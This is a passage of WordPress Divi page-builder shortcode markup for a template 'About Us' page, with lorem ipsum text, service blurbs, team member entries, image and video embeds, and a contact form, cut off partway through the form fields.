_builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#fcd21d\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#fcd21d\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" 